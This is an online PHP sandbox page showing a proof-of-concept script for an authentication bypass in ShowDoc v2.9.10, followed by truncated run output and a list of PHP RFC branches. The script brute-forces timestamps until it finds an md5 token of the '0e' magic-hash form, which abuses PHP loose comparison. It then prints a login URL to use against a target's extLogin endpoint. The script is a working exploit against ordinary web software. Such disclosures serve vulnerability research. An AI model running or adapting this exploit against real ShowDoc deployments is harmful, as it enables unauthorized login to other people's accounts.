Online PHP editor | rfc for DBlsO

@ 2021-10-13T14:57:21Z

<?php
    //	Credit：Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
    //  Date：2021/10/13
    /*
  	 	ShowDoc v2.9.10 Auth Bypass PoC #2:
  	    1) PHP Type Juggling (弱类型), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
  	    2) Using that:
  	         ('0e111' == '0e222') => (bool)true
  	    3) This script use Brute-Forcing to find a possible collision
    */
    $username = 's' ; // Forged username
    $time = 1694131871 ; //2023-09-08 08:11:11, always valid timestamp
    $login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; //a possible bin2hex( random_bytes( 16 ) );


    $total = 1000000;
    for ($i=0; $i<(1000*$total); $i++){// try to Find solution in 1 Billion numbers!
        $time += 1;
        $token = md5($username.$login_secret_key.$time);
        if (substr($token, 0, 2) === "0e"){
            if(preg_match('/^[0]+e[0-9]+$/', $token)) //0e123, 00e123, ...
            {
                echo "time:$time, while final is: $token".PHP_EOL;
            }
            
        }
        if (($i % $total) == 0){
            echo "[".($i/$total)."‰]".PHP_EOL;
        }
    }

    echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL;// Please replace the [showdoc] to your target

?>

Output for git.master, git.master_jit: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰]
Process exited with code 137.
Output for rfc.property-hooks: [0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰] [9‰]
Process exited with code 137.

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page

2020-03-21 RFC: Is_Literal - declined
2020-12-04 Enumerations - included in PHP 8.1
2018-06-15 Typed Properties v2 - implemented in PHP 7.4
2016-08-12 Object typehint - included in PHP 7.2
2016-08-14 Arrow functions - withdrawn
2016-05-29 array_change_keys() - withdrawn
2016-04-19 Lexical scope support for anonymous classes - suspended
2016-04-17 Functional Interfaces - declined
2016-03-16 Typed Properties - superseded in favor of Typed Properties 2.0
2015-08-27 Callable Prototypes - declined
2015-05-01 Short Closures - declined / withdrawn in favor of Arrow Functions
2015-02-18 Scalar type hints v5 - included in PHP 7
2015-02-14 Union Types - declined
2013-09-22 Anonymous classes - included in PHP 7

preferences:dark modelive preview